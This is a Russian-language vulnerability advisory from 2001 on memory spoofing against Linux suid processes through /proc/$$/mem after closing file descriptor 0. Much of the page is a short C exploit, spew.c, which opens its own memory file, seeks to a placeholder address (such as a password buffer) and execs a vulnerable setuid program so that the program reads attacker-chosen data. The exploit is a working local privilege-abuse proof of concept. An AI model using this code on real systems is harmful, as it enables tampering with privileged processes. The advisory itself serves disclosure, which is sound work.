Проблема memory spoofing в LINUX

Дата публикации:
28.06.2001
Дата изменения:
17.10.2006
Всего просмотров:
1070
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание:

Найдена возможность подмены памяти suid процесса в LINUX. Это становиться возможным ( при определенных обстоятельствах), читать из /proc/$$/mem при закрытии fd 0 и при этом сместившись по нужному адресу.

Эксплоит:

/* spew.c */

#include <stdio.h>

/* to get the address, ltrace a copy of the program as a normal user,

or brute force it over the expected range. */



#define WHERETOREAD [the address malloced for password by vuln-prog]

// use ltrace on a non setuid copy of the program, or bruteforce it.

main()

{

char y[1000];

FILE *f;

int p;

p=getpid();

sprintf(y,"/proc/%d/mem",p);

close(0);

f=fopen(y,"r");

fseek(f,WHERETOREAD,SEEK_SET);

execl("/tmp/vuln-prog","scary","/tmp/myscript",0);

}


 


или введите имя

CAPTCHA